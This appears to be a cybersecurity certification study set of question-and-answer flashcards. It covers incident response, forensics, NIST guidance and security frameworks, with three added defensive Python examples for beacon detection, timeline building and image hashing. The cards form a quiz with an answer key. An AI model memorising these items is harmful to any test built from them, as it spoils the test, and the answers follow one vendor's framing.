Upgrading the organization's firewall to block a new type of attack would occur in the __________________ incident response phase.
preparation
Recovering normal operations after eradicating an incident would occur in the __________________ incident response phase.
containment, eradication, and recovery
Identifying the attacker(s) and attacking system(s) would occur in the __________________ incident response phase.
containment, eradication, and recovery
Interpreting log entries using a SIEM to identify a potential incident would occur in the __________________ incident response phase.
detection and analysis
Assembling the hardware and software required to conduct an incident investigation would occur in the __________________ incident response phase.
preparation
__________________ are a set of packets passing from a source system to a destination system in a given time interval.
flows
__________________ is a Windows tool that monitors memory, CPU, and disk usage.
Resmon
__________________ is a tool for testing the maximum available bandwidth for a network.
iPerf
__________________ is a network management and monitoring tool that provides central visibility into flows and SNMP data for an entire network.
PRTG
__________________ is traffic sent to a command and control system by a PC that is part of a botnet.
beaconing
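The flow and beaconing cards above are two halves of one detection: NetFlow-style records aggregate packets into flows, and a bot calling its command and control system shows up as flows to the same destination at nearly constant intervals. The following is an added example, not part of the original set: it aggregates constructed packet records into flows keyed by the 5-tuple with an inactive timeout, then flags (source, destination, port) groups whose flow start times are evenly spaced, using the coefficient of variation of the gaps. The packets are constructed for the example and the 60-second interval and 0.2 threshold are assumptions a real deployment would tune.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed packet records (not a real capture): (time_s, src, sport, dst, dport, proto, bytes).
SAMPLE_PACKETS = [
    # One host opening a fresh connection to the same external server every ~60 s: beacon-like.
    (0,   "10.0.0.23", 51000, "198.51.100.77", 443, "tcp", 120),
    (60,  "10.0.0.23", 51001, "198.51.100.77", 443, "tcp", 120),
    (121, "10.0.0.23", 51002, "198.51.100.77", 443, "tcp", 120),
    (180, "10.0.0.23", 51003, "198.51.100.77", 443, "tcp", 120),
    (239, "10.0.0.23", 51004, "198.51.100.77", 443, "tcp", 120),
    (300, "10.0.0.23", 51005, "198.51.100.77", 443, "tcp", 120),
    # Ordinary browsing: a burst of packets on one connection, a new connection much later,
    # and a single visit to the suspicious server that should not be flagged on its own.
    (5,   "10.0.0.10", 40000, "93.184.216.34", 443, "tcp", 1500),
    (6,   "10.0.0.10", 40000, "93.184.216.34", 443, "tcp", 900),
    (7,   "10.0.0.10", 40000, "93.184.216.34", 443, "tcp", 60),
    (400, "10.0.0.10", 40001, "93.184.216.34", 443, "tcp", 1500),
    (30,  "10.0.0.10", 40002, "198.51.100.77", 443, "tcp", 700),
]

def build_flows(packets, inactive_timeout=60):
    """Aggregate packets into unidirectional flows keyed by the 5-tuple. A gap longer than
    inactive_timeout seconds between packets of one 5-tuple closes the flow and starts a
    new one, the way a NetFlow exporter's inactive timer does."""
    flows, active = [], {}
    for ts, src, sport, dst, dport, proto, size in sorted(packets):
        key = (src, sport, dst, dport, proto)
        idx = active.get(key)
        if idx is None or ts - flows[idx]["end"] > inactive_timeout:
            flows.append({"key": key, "start": ts, "end": ts, "packets": 0, "bytes": 0})
            idx = active[key] = len(flows) - 1
        flows[idx]["end"] = ts
        flows[idx]["packets"] += 1
        flows[idx]["bytes"] += size
    return flows

def find_beacons(flows, min_flows=5, max_cv=0.2):
    """Group flows by (src, dst, dport) and flag groups whose flow start times are evenly
    spaced, i.e. the coefficient of variation of the inter-flow gaps is at or below max_cv."""
    starts = defaultdict(list)
    for f in flows:
        src, _, dst, dport, _ = f["key"]
        starts[(src, dst, dport)].append(f["start"])
    beacons = []
    for (src, dst, dport), times in starts.items():
        if len(times) < min_flows:           # too few samples to call anything periodic
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else float("inf")
        if cv <= max_cv:
            beacons.append({"src": src, "dst": dst, "dport": dport, "flows": len(times),
                            "interval_s": round(avg, 1), "cv": round(cv, 3)})
    return beacons

if __name__ == "__main__":
    flows = build_flows(SAMPLE_PACKETS)
    for f in flows:
        print(f["key"], f["start"], f["end"], f["packets"], f["bytes"])
    print(find_beacons(flows))
```

Real beacons add jitter and sleep through business hours, so production logic also looks at the byte-size regularity of the flows and at how long the pattern persists; the two single-destination browsing groups here fall below min_flows and are never scored.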
__________________ is a protocol for collecting information like status and performance about devices on a network.
SNMP
__________________ is a Linux command that displays processes, memory utilization, and other details about running programs.
top
__________________ is a Windows tool that monitors a wide range of devices and services, including energy, USB, and disk usage.
Perfmon
__________________ is a Linux tool used to create disk images.
dd
__________________ is used to determine whether a drive is forensically sound.
md5sum (or sha256sum): hashing the image and the original drive and comparing the digests shows whether the copy is forensically sound; MD5 is collision-prone, so pair it with SHA-256 where the tooling allows
__________________ is a memory forensics and analysis suite.
Volatility Framework
__________________ is a full-featured forensic suite.
FTK
__________________ is a drive and file wiping utility sometimes used for anti-forensic purposes.
Eraser
__________________ is a device used to prevent forensic software from modifying a drive while accessing it.
write blocker
__________________ is a tool used to review Windows memory dumps.
WinDBG
__________________ is a device used to create a complete forensic image and validate without a PC.
forensic drive duplicator
In Incident Response, which CompTIA category would you assign patching?
validation
In Incident Response, which CompTIA category would you assign sanitization?
eradication
In Incident Response, which CompTIA category would you assign lessons learned?
post-incident activities
In Incident Response, which CompTIA category would you assign reimaging?
eradication
In Incident Response, which CompTIA category would you assign secure disposal?
eradication
In Incident Response, which CompTIA category would you assign isolation?
containment
In Incident Response, which CompTIA category would you assign scanning?
validation
In Incident Response, which CompTIA category would you assign removal?
containment
In Incident Response, which CompTIA category would you assign reconstruction?
eradication
In Incident Response, which CompTIA category would you assign permission verification?
validation
In Incident Response, which CompTIA category would you assign user account review?
validation
In Incident Response, which CompTIA category would you assign segmentation?
containment
In Policy, what outlines a step-by-step process for carrying out a cybersecurity activity?
procedure
In Policy, what includes advice based on best practices for achieving security goals that are not mandatory?
guidelines
In Policy, what provides high-level requirements for a cybersecurity program?
policy
In Policy, what offers detailed requirements for achieving security control objectives?
standard
In Security Architecture, _____________ is a security design that protects all elements of the environment at the same level using the same tools and techniques.
uniform protection
In Security Architecture, _____________ is the portion of an organization, system, or network that can be attacked.
attack surface
In Security Architecture, _____________ are controls that include processes and policies.
administrative controls
In Security Architecture, _____________ are protected networks or locations separated from other security zones by protective controls.
protected enclaves
In Security Architecture, _____________ is a security control that prevents individuals from performing sensitive actions without a trusted peer reviewing and approving their actions.
dual control
In Security Architecture, _____________ is a part of a system that, if it fails, will cause the failure of the entire system.
single point of failure
In Security Architecture, _____________ is a personnel security control that can help to identify individuals who are exploiting the rights they have as part of their job.
mandatory vacation
In Security Architecture, _____________ is a control that remediates a gap or flaw in another control.
compensating control
In Identity and Access Management, __________ is a Cisco-designed authentication protocol.
TACACS+
In Identity and Access Management, __________ is the set of claims made about an account holder.
identity
In Identity and Access Management, __________ is Microsoft's identity federation system.
ADFS
In Identity and Access Management, __________ is an issue that occurs when accounts gain more rights over time due to role changes.
privilege creep
In Identity and Access Management, a __________ is the role in which LDAP is typically deployed.
directory service
In Identity and Access Management, __________ is an open standard for authorization used for websites and applications.
OAuth 2.0
In Identity and Access Management, __________ is an XML-based protocol used to exchange authentication and authorization data.
SAML
In Identity and Access Management, __________ is a common AAA system for network devices.
RADIUS
In Security Tools, __________ is a source control management tool.
Subversion
In Security Tools, __________ is an SDLC model that relies on sprints to accomplish tasks based on user stories.
Agile
In Security Tools, __________ is a code analysis that is done using a running application.
dynamic code analysis
In Security Tools, __________ is a code analysis done using a running application that relies on sending unexpected data to see if the application fails.
fuzzing
In Security Tools, __________ is a formal code review process that relies on specified entry and exit criteria for each phase.
Fagan inspection
In Security Tools, __________ is a code review process that requires one developer to explain their code to another developer.
over the shoulder
In Security Tools, __________ is the first SDLC model, replaced in many organizations but still used for very complex systems.
waterfall
In Security Tools, __________ is an Agile term that describes the list of features needed to complete a project.
backlog
Which format does dd produce files in?
RAW
File remnants found in clusters that have been only partially overwritten by new files are found in what type of space?
slack
Mike is looking for information about files that were changed on a Windows system. Which of the following is least likely to contain useful information for his investigation?
event logs
The __________ contain specific information about files.
Master File Table (MFT) and file indexes (INDX files)
__________ help show differences between files and locations at a point in time.
Volume shadow copies
Alice wants to copy a drive without any chance of it being modified by the copying process. What type of device should she use to ensure that this does not happen?
a write blocker
__________ ensure that no changes are made to a source drive when creating a forensic copy.
write blockers
Frederick wants to determine if a thumb drive was ever plugged into a Windows system. How can he test for this?
use the USB Historian
A __________ provides a list of USB devices that have been logged in the Windows Registry.
USB Historian
What two files may contain encryption keys normally stored only in memory on a Windows system?
core dumps and hibernation files
Core dumps and hibernation files both contain an image of the live memory of a system, potentially allowing __________ to be retrieved from the stored file.
encryption keys
The __________ provides information about file layout.
Master File Table (MFT)
The __________ contains system information.
Registry
Jeff is investigating a system compromise and knows that the first event was reported on October 5th. What forensic tool capability should he use to map other events found in logs and files to this date?
a timeline
Timelines are one of the most useful tools when conducting an investigation of a compromise or other event. __________ provide built-in timeline capabilities to allow this type of analysis.
Forensic tools
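The two cards above describe mapping events from several sources onto one timeline around a pivot date. The following added example, which is not part of the original flashcard set, does that by hand so the mechanics are visible: it parses an Apache access log, file modification times and Windows event records (all constructed for the example, including the October 2019 dates and the IP addresses), normalizes every timestamp to UTC, sorts them into a single timeline, and then pulls out the activity that predates the first report.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed evidence from three sources (not from any real investigation).
APACHE_LOG = """\
203.0.113.10 - - [03/Oct/2019:22:14:05 -0400] "GET /admin/upload.php HTTP/1.1" 200 512
203.0.113.10 - - [03/Oct/2019:22:14:41 -0400] "POST /admin/upload.php HTTP/1.1" 200 88
198.51.100.7 - - [05/Oct/2019:08:02:13 -0400] "GET /index.html HTTP/1.1" 200 4120
"""

# File system metadata as a forensic tool would export it: (path, last modified, ISO 8601).
FILE_MTIMES = [
    ("/var/www/html/images/cache.php", "2019-10-04T02:15:10+00:00"),
    ("/var/www/html/index.html", "2019-09-12T17:40:00+00:00"),
]

# Windows event log entries from a domain controller in the same environment.
WINDOWS_EVENTS = [
    {"time": "2019-10-05T09:30:00Z", "event_id": 4720, "msg": "A user account was created"},
    {"time": "2019-10-05T14:02:00-05:00", "event_id": 4624, "msg": "An account was successfully logged on"},
]

APACHE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\d+|-)')


def _utc(dt):
    """Every source keeps its own zone offset; the timeline is built in UTC only."""
    return dt.astimezone(timezone.utc)


def parse_apache(text):
    events = []
    for line in text.splitlines():
        match = APACHE_RE.match(line)
        if not match:
            continue
        when = datetime.strptime(match.group(2), "%d/%b/%Y:%H:%M:%S %z")
        events.append((_utc(when), "apache", f'{match.group(1)} "{match.group(3)}" {match.group(4)}'))
    return events


def parse_iso(stamp):
    # datetime.fromisoformat() only accepts a trailing "Z" from Python 3.11 on
    return _utc(datetime.fromisoformat(stamp.replace("Z", "+00:00")))


def build_timeline(apache_text, mtimes, win_events):
    """Merge all sources into one list of (utc_time, source, detail) sorted by time."""
    events = parse_apache(apache_text)
    events += [(parse_iso(ts), "mtime", path) for path, ts in mtimes]
    events += [(parse_iso(e["time"]), "windows", f'{e["event_id"]} {e["msg"]}') for e in win_events]
    return sorted(events, key=lambda event: event[0])


def events_before(timeline, pivot, days):
    """Events in [pivot - days, pivot): activity that predates the first report."""
    start = pivot - timedelta(days=days)
    return [event for event in timeline if start <= event[0] < pivot]


if __name__ == "__main__":
    timeline = build_timeline(APACHE_LOG, FILE_MTIMES, WINDOWS_EVENTS)
    first_report = datetime(2019, 10, 5, tzinfo=timezone.utc)
    for when, source, detail in events_before(timeline, first_report, days=2):
        print(when.isoformat(), source, detail)
```

Pivoting on 5 October and looking two days back surfaces the upload requests and the newly written cache.php from the night of 3 to 4 October, which no single source shows by itself. The zone conversion is the step most often skipped: the -0400 Apache stamps and the -05:00 Windows stamp interleave correctly only once everything is in UTC.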
To verify that the original disk has not changed, run __________ prior to and after the cloning process.
MD5sum
Jennifer wants to perform memory analysis and forensics for Windows, macOS , and Linux systems. Which of the following best suits her needs?
The Volatility Framework
LiME and fmem are __________ used to perform memory analysis and forensics.
Linux tools
__________ is a Windows-only tool, used to perform memory analysis and forensics.
DumpIt
Alex is conducting a forensic examination of a Windows system and wants to determine if an application was installed. Where can he find the Windows installer log files for a user named Jim?
C:\Users\Jim\AppData\Local\Temp
__________ are typically kept in the user's temporary app data folder.
Windows Installer logs
Kathleen needs to find data contained in memory but only has an image of an offline Windows system. Where does she have the best chance of recovering the information she needs?
%SystemRoot%\MEMORY.DMP
__________ are stored in %SystemRoot%\MEMORY.DMP and contain the memory state of the system when the system crash occurred.
Windows crash dumps
__________ is a Windows debugger.
WinDbg
Carl does not have the ability to capture data from a cell phone using forensic or imaging software, and the phone does not have removable storage. Fortunately, the phone was not set up with a PIN or screen lock. What is his best option to ensure he can see email and other data stored there?
manual access
Manual access is used when phones cannot be __________ or accessed as a volume or filesystem. Manual access requires that the phone be reviewed by hand, with pictures and notes preserved to document the contents of the phone.
forensically imaged
What forensic issue might the presence of a program like CCleaner indicate?
anti-forensic activities
__________ is a PC cleanup utility that wipes Internet history, destroys cookies and other cached data, and can impede forensic investigations.
CCleaner
Which of the following is not a potential issue with live imaging of a system?
unallocated space will be captured
Unallocated space is typically not captured during a __________, potentially resulting in data being missed.
live image
Remnant data from the tool, memory and drive contents changing while the image is occurring, and malware detecting the tool are all possible issues that may occur when __________ a system.
live imaging
During his investigation, Jeff, a certified forensic examiner, is provided with a drive image created by an IT staff member and is asked to add it to his forensic case. What is the most important issue Jeff could encounter if the case goes to court?
inability to certify chain of custody
Susan has been asked to identify the applications that start when a Windows system does. Where should she look first?
the Registry
Windows stores information about programs that run at startup in the Registry as __________ keys; Run keys execute at every logon, while RunOnce keys execute once and are then deleted.
Run and RunOnce
During a forensic investigation Ben asks Chris to sit with him and to sign off on the actions he has taken. What is he doing?
maintaining chain of custody
While maintaining chain of custody, one person acts as a __________ to the process for the actions another person is taking.
validator and witness
Which tool is not commonly used to generate the hash of a forensic copy?
AES (it is an encryption algorithm, not a hash function)
MD5, SHA1, and built-in hashing tools in FTK and other commercial tools are commonly used for creating __________.
forensic hashes
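The cards on dd, md5sum, hashing before and after cloning, and forensic hashes all describe one procedure: copy the device block for block, hash the source and the copy, and compare. The following added example, not part of the original flashcard set, carries that procedure out on a constructed "drive" file in a temporary directory (the device contents, block size and file names are invented for the example). It also shows what happens when the source is written after imaging, which is the situation a write blocker exists to prevent.

```python
import hashlib
import os
import tempfile

BLOCK_SIZE = 4096  # plays the role of dd's bs= argument


def hash_file(path, algorithm="sha256", block_size=BLOCK_SIZE):
    """Stream the file through hashlib; same digest md5sum/sha256sum would print."""
    digest = hashlib.new(algorithm)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(block_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def image_device(source, dest, block_size=BLOCK_SIZE):
    """Block-for-block raw copy, the same RAW output `dd if=source of=dest bs=4096` gives."""
    copied = 0
    with open(source, "rb") as src, open(dest, "wb") as dst:
        for block in iter(lambda: src.read(block_size), b""):
            dst.write(block)
            copied += len(block)
    return copied


def verify_image(source, image, algorithms=("md5", "sha256")):
    """Hash both files with every algorithm; the image is sound only if all digests match."""
    report = {}
    for algo in algorithms:
        src_hash, img_hash = hash_file(source, algo), hash_file(image, algo)
        report[algo] = {"source": src_hash, "image": img_hash, "match": src_hash == img_hash}
    report["sound"] = all(report[algo]["match"] for algo in algorithms)
    return report


def demo():
    """Image a constructed 'drive', verify it, then show the effect of a post-imaging write."""
    with tempfile.TemporaryDirectory() as workdir:
        drive = os.path.join(workdir, "sdb")
        image = os.path.join(workdir, "sdb.raw")
        # Constructed device contents: a header block, one file, and trailing unallocated space.
        with open(drive, "wb") as fh:
            fh.write(b"FAKEFS\x00" + b"\x00" * 1017)
            fh.write(b"secret-document-contents".ljust(BLOCK_SIZE, b"\x00"))
            fh.write(b"\x00" * (BLOCK_SIZE * 2))
        size = os.path.getsize(drive)

        copied = image_device(drive, image)
        before = verify_image(drive, image)  # hashes taken right after cloning

        # Without a write blocker the source can change under the examiner; flip one byte.
        with open(drive, "r+b") as fh:
            fh.seek(1024)
            fh.write(b"S")
        after = verify_image(drive, image)  # the same comparison now fails
        return {"device_bytes": size, "copied": copied, "clean": before, "tampered": after}


if __name__ == "__main__":
    result = demo()
    print("copied", result["copied"], "of", result["device_bytes"], "bytes")
    print("clean image sound:", result["clean"]["sound"])
    print("after source modified:", result["tampered"]["sound"])
```

A single changed byte flips every digest, which is the point of hashing immediately after cloning and again whenever the copy is handed over: the hashes, not the examiner's word, prove the image still matches the original. Recording two algorithms costs little and means a collision in one does not undermine the record.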
Which of the following Linux command-line tools will show you how much disk space is in use?
df
In Linux command-line tools, __________ tools will show you information about processes, CPU, and memory utilization.
top and ps
In Linux command-line tools, __________ is a multifunction tool for listing open files.
lsof
Which one of the phases of incident response involves primarily active undertakings designed to limit the damage that an attacker might cause?
containment, eradication, and recovery
The containment, eradication, and recovery phase of __________ includes active undertakings designed to minimize the damage caused by the incident and restore normal operations as quickly as possible.
incident response
Which one of the following criteria is not normally used when evaluating the appropriateness of a cybersecurity incident containment strategy?
log records generated by the strategy
NIST recommends using six criteria to __________ a containment strategy: the potential damage to resources, the need for evidence preservation, service availability, time and resources required (including cost), effectiveness of the strategy, and duration of the solution.
evaluate
Which choice is one of the six criteria NIST recommends to evaluate a containment strategy?
the potential damage to resources
Which choice is one of the six criteria NIST recommends to evaluate a containment strategy?
the need for evidence preservation
Which choice is one of the six criteria NIST recommends to evaluate a containment strategy?
service availability
Which choice is one of the six criteria NIST recommends to evaluate a containment strategy?
time and resources required (including cost)
Which choice is one of the six criteria NIST recommends to evaluate a containment strategy?
effectiveness of the strategy
Which choice is one of the six criteria NIST recommends to evaluate a containment strategy?
duration of the solution
Alice is responding to a cybersecurity incident and notices a system that she suspects is compromised. She places this system on a quarantine VLAN with limited access to other networked systems. What containment strategy is Alice pursuing?
segmentation
Alice confers with other team members and decides that even allowing limited access to other systems is an unacceptable risk and decides instead to prevent the quarantine VLAN from accessing any other systems by putting firewall rules in place that limit access to other enterprise systems. The attacker can still control the system to allow Alice to continue monitoring the incident. What strategy is she pursuing?
isolation
After observing the attacker, Alice decides to remove the Internet connection entirely, leaving the systems running but inaccessible from outside the quarantine VLAN. What strategy is she pursuing?
removal
What tool may be used to isolate an attacker so that they may not cause damage to production systems but may still be observed by cybersecurity analysts?
sandbox
Tamara is a cybersecurity analyst for a private business that is suffering a security breach. She believes the attackers have compromised a database containing sensitive information. Which one of the following activities should be Tamara's first priority?
containment
Which one of the following activities does CompTIA classify as part of the recovery validation effort?
scanning
CompTIA includes ____________________ in the set of validation activities that cybersecurity analysts should undertake in the aftermath of a security incident.
patching
CompTIA includes ____________________ in the set of validation activities that cybersecurity analysts should undertake in the aftermath of a security incident.
permissions
CompTIA includes ____________________ in the set of validation activities that cybersecurity analysts should undertake in the aftermath of a security incident.
security scanning
CompTIA includes ____________________ in the set of validation activities that cybersecurity analysts should undertake in the aftermath of a security incident.
verifying logging/communication to monitoring
Which one of the following pieces of information is most critical to conducting a solid incident recovery effort?
root cause of the attack
Understanding the root cause of an attack is critical to the ____________________. Analysts should examine all available information to help reconstruct the attackers' actions. This information is crucial to remediating security controls and preventing future similar attacks.
incident recovery effort
Lynda is disposing of a drive containing sensitive information that was collected during the response to a cybersecurity incident. The information is categorized as a high security risk and she wishes to reuse the media during a future incident. What is the appropriate disposition for this information?
purge
In the NIST Guidelines for Media Sanitization, ____________________ applies logical techniques to sanitize data in all user-addressable storage locations for protection against simple non-invasive data recovery techniques.
clear
In the NIST Guidelines for Media Sanitization, ____________________ applies physical or logical techniques that render target data recovery infeasible using state-of-the-art laboratory techniques.
purge
In the NIST Guidelines for Media Sanitization, ____________________ renders data recovery infeasible using state-of-the-art laboratory techniques and results in the subsequent inability to use the media for storage of data.
destroy
In the NIST Guidelines for Media Sanitization, clearing is typically applied through: ______________.
rewriting with a new value or using a menu option to reset the device to the factory state
In the NIST Guidelines for Media Sanitization, examples of purging include: __________________.
degaussing, overwriting, block erase, and cryptographic erase when performed through the use of dedicated, standardized device commands
In the NIST Guidelines for Media Sanitization, examples of destroying include: ____________________.
disintegration, pulverization, melting, and incinerating
In the NIST Guidelines for Media Sanitization, if the security categorization is low and the media is not leaving the organization's control, it can be ____________________.
cleared then validated
In the NIST Guidelines for Media Sanitization, if the security categorization is low and the media is leaving the organization's control, it should be ____________________.
purged then validated
In the NIST Guidelines for Media Sanitization, if the security categorization is moderate and the media will not be reused, it should be ____________________.
destroyed then validated
In the NIST Guidelines for Media Sanitization, if the security categorization is moderate and the media will be reused AND is not leaving the organization's control, it should be ____________________.
cleared then validated
In the NIST Guidelines for Media Sanitization, if the security categorization is moderate and the media will be reused AND is leaving the organization's control, it should be ____________________.
purged then validated
In the NIST Guidelines for Media Sanitization, if the security categorization is high and the media will not be reused, it should be ____________________.
destroyed then validated
In the NIST Guidelines for Media Sanitization, if the security categorization is high and the media will be reused AND is not leaving the organization's control, it should be ____________________.
purged then validated
In the NIST Guidelines for Media Sanitization, if the security categorization is high and the media will be reused AND is leaving the organization's control, it should be ____________________.
destroyed then validated
Which one of the following activities is not normally conducted during the recovery validation phase?
implement new firewall rules
New firewall rules, if required, would be implemented during the ______________.
eradication and recovery phase
The ______________ includes verifying accounts and permissions, verifying the logging is working properly, and conducting vulnerability scans.
validation phase
What incident response activity focuses on removing any artifacts of the incident that may remain on the organization's network?
eradication
Eradication, during an incident response activity, may include: ______________.
removal of any malicious code from the network, sanitization of compromised media, and securing of compromised user accounts
Which one of the following is not a common use of formal incident reports?
sharing with other organizations
Formal incident reports should be classified and not disclosed to external parties. Formal incident reports: ______________.
create an institutional memory of the incident that is useful when developing new security controls and training new security team members, serve as an important record of the incident if there is ever legal action that results from an incident.
Which one of the following data elements would not normally be included in an evidence log?
malware signatures
Sondra determines that an attacker has gained access to a server containing critical business files and wishes to ensure that the attacker cannot delete those files. What strategy would meet Sondra's goal?
None; even removing a system from the network does not guarantee that the attack will not continue. An attacker can run a script on a server that detects when it has been removed from the network and then proceeds to destroy data stored on the server.
Joe would like to determine the appropriate disposition of a flash drive used to gather highly sensitive evidence during an incident response effort. He does not need to reuse the drive but wants to return it to its owner, an outside contractor. What is the appropriate disposition?
destroy
Which one of the following is not typically found in a cybersecurity incident report?
identity of the attacker
______________ should include a chronology of events, estimates of the impact, and documentation of lessons learned, in addition to other information.
Incident Reports
What NIST publication contains guidance on cybersecurity incident handling?
SP 800-61
NIST SP 800-61 is the ______________.
Computer Security Incident Handling Guide
NIST SP 800-53 is the ______________.
Security and Privacy Controls for Federal Information Systems and Organizations
NIST SP 800-88 is the ______________.
Guidelines for Media Sanitization
NIST SP 800-18 is the ______________.
Guide for Developing Security Plans for Federal Information Systems
Computer Security Incident Handling Guide
NIST SP 800-61
Security and Privacy Controls for Federal Information Systems and Organizations
NIST SP 800-53
Guidelines for Media Sanitization
NIST SP 800-88
Guide for Developing Security Plans for Federal Information Systems
NIST SP 800-18
Which one of the following is not a purging activity?
resetting to factory state
Resetting a device to factory state is an example of ______________.
data clearing
Ben is responding to a security incident and determines that the attacker is using systems on Ben's network to attack a third party. Which one of the following containment approaches will prevent Ben's systems from being used in this manner?
removal (disconnecting the compromised systems from the network entirely)
Joe is authoring a document that explains to system administrators one way that they might comply with the organization's requirement to encrypt all laptops. What type of document is Joe writing?
guideline
If someone is authoring a guideline, it indicates that ______________ with the document is not mandatory.
compliance
Which one of the following statements is not true about compensating controls under PCI DSS?
controls used to fulfill one PCI DSS requirement may be used to compensate for the absence of a control needed to meet another requirement
In ______________, controls must meet the intent and rigor of the original requirement and must provide a similar level of defense as the original requirement.
compensating controls under PCI DSS
What law creates cybersecurity obligations for healthcare providers and others in the health industry?
HIPAA
Which one of the following is not one of the five core security functions defined by the NIST Cybersecurity Framework?
contain
The five core security functions, as defined by the NIST Cybersecurity Framework are:
identify, protect, detect, respond, and recover
What International Organization for Standardization (ISO) standard applies to information security management controls?
ISO 27001
ISO 27001, is published by the International Organization for Standardization (ISO) and is titled ______________.
Information technology - Security techniques - Information security management systems - Requirements
Which document must normally be approved by the CEO or similarly high-level executive?
policy
What SABSA architecture layer corresponds to the designer's view of security architecture?
Logical Security Architecture
What SABSA architecture layer corresponds to the Architect's view of security architecture?
Conceptual Security Architecture
What SABSA architecture layer corresponds to the Business view of security architecture?
Contextual Security Architecture
What SABSA architecture layer corresponds to the Builder's view of security architecture?
Physical Security Architecture
What SABSA architecture layer corresponds to the Tradesman's view of security architecture?
Component Security Architecture
What SABSA architecture layer corresponds to the Service Manager's view?
Security Service Management Architecture
What law governs the financial records of publicly traded companies?
Sarbanes-Oxley (SOX) Act
What TOGAF domain provides the organization's approach to storing and managing information assets?
data architecture
In TOGAF, the __________________ domain defines governance and organization and explains the interaction between enterprise architecture and business strategy.
Business architecture
In TOGAF, the __________________ domain includes the applications and systems that an organization deploys, the interactions between those systems, and their relation to business processes.
Applications architecture
In TOGAF, the __________________ domain provides the organization's approach to storing and managing information assets.
Data architecture
In TOGAF, the __________________ domain describes the infrastructure needed to support the other architectural domains.
Technical architecture
TOGAF also includes the __________________, which describes how an organization moves through the cyclical process of developing its own enterprise architecture.
Architecture Development Method (ADM)
__________________ is a framework that offers a comprehensive approach to IT service management within the modern enterprise.
The Information Technology Infrastructure Library (ITIL)
The Information Technology Infrastructure Library (ITIL) covers five core activities. __________________ is one of these activities and is central in the life cycle.
Service Strategy
The Information Technology Infrastructure Library (ITIL) covers five core activities. __________________ is one of three connected to the Service Strategy in the life cycle.
Service Design
The Information Technology Infrastructure Library (ITIL) covers five core activities. __________________ is one of three connected to the Service Strategy in the life cycle.
Service Operation
The Information Technology Infrastructure Library (ITIL) covers five core activities. __________________ is one of three connected to the Service Strategy in the life cycle.
Service Transition
The Information Technology Infrastructure Library (ITIL) covers five core activities. __________________ is considered continuous in the life cycle.
Continual Service Improvement
__________________ are security controls that impact the physical world: fences, perimeter lighting, locks, fire suppression systems, and burglar alarms.
Physical controls
__________________ are technical controls that enforce confidentiality, integrity, and availability in the digital space: firewall rules, access control lists, intrusion prevention systems, and encryption.
Logical controls
__________________ are procedural mechanisms that an organization follows to implement sound security management practices: user account reviews, employee background investigations, log reviews, and separation-of-duties policies.
Administrative controls
Which one of the following would not normally be found in an organization's information security policy?
Requirement to use AES-256 encryption
__________________ do not normally contain prescriptive technical guidance, such as a requirement to use a specific encryption algorithm.
Security policies
A requirement to use AES-256 encryption would normally be found in a __________________.
security standard
Darren is helping the Human Resources department create a new policy for background checks on new hires. What type of control is Darren creating?
administrative
Which one of the following control models describes the five core activities associated with IT service management as service strategy, service design, service transition, service operation, and continual service improvement?
Information Technology Infrastructure Library (ITIL)
What compliance obligation applies to merchants and service providers who work with credit card information?
PCI DSS
The PCI DSS provides detailed rules about the __________________of credit and debit card information. PCI DSS is not a law but rather a contractual obligation that applies to credit card merchants and service providers.
storage, processing, and transmission
Which one of the following policies would typically answer questions about when an organization should destroy records?
data retention policy
While studying an organization's risk management process under the NIST Cybersecurity Framework, Rob determines that the organization adapts its cybersecurity practices based on lessons learned and predictive indicators derived from previous and current cybersecurity activities. What tier should he assign based on this measure?
Tier 4
Under the NIST Cybersecurity Framework, __________________ of the Risk Management Process indicates organizational cybersecurity risk management practices are not formalized, and risk is managed in an ad hoc and sometimes reactive manner.
Tier 1: Partial
Under the NIST Cybersecurity Framework, __________________ of the Risk Management Process indicates risk management practices are approved by management but may not be established as organizational-wide policy.
Tier 2: Risk Informed
Under the NIST Cybersecurity Framework, __________________ of the Risk Management Process indicates the organization's risk management practices are formally approved and expressed as policy.
Tier 3: Repeatable
Under the NIST Cybersecurity Framework, __________________ of the Risk Management Process indicates the organization adapts its cybersecurity practices based on lessons learned and predictive indicators derived from previous and current cybersecurity activities
Tier 4: Adaptive
Under the NIST Cybersecurity Framework, __________________ of the Integrated Risk Management Program indicates there is limited awareness of cybersecurity risk at the organizational level and an organization-wide approach to managing cybersecurity risk has not been established.
Tier 1: Partial
Under the NIST Cybersecurity Framework, __________________ of the Integrated Risk Management Program indicates there is an awareness of cybersecurity risk at the organizational level but an organization-wide approach to managing cybersecurity risk has not been established.
Tier 2: Risk Informed
Under the NIST Cybersecurity Framework, __________________ of the Integrated Risk Management Program indicates there is an organization-wide approach to manage cybersecurity risk.
Tier 3: Repeatable
Under the NIST Cybersecurity Framework, __________________ of the Integrated Risk Management Program indicates there is an organization-wide approach to managing cybersecurity risk that uses risk-informed policies, processes, and procedures to address potential cybersecurity events.
Tier 4: Adaptive
Under the NIST Cybersecurity Framework, __________________ of the External Participation section indicates an organization may not have the processes in place to participate in coordination or collaboration with other entities.
Tier 1: Partial
Under the NIST Cybersecurity Framework, __________________ of the External Participation section indicates the organization knows its role in the larger ecosystem but has not formalized its capabilities to interact and share information externally.
Tier 2: Risk Informed
Under the NIST Cybersecurity Framework, __________________ of the External Participation section indicates the organization understands its dependencies and partners and receives information from these partners that enables collaboration and risk-based management decisions within the organization in response to events.
Tier 3: Repeatable
Under the NIST Cybersecurity Framework, __________________ of the External Participation section indicates the organization manages risk and actively shares information with partners to ensure that accurate, current information is being distributed and consumed to improve cybersecurity before a cybersecurity event occurs.
Tier 4: Adaptive
Which one of the following security policy framework components does not contain mandatory guidance for individuals in the organization?
guideline
Compliance with ______________ is mandatory.
policies, standards, and procedures
Tina is creating a set of firewall rules designed to block denial-of-service attacks from entering her organization's network. What type of control is Tina designing?
Logical control
Allan is developing a document that lists the acceptable mechanisms for securely obtaining remote administrative access to servers in his organization. What type of document is Allan writing?
standard
______________ describe specific security controls that must be in place for an organization.
Standards
Which one of the following is not a common use of the NIST Cybersecurity Framework?
create specific technology requirements for an organization
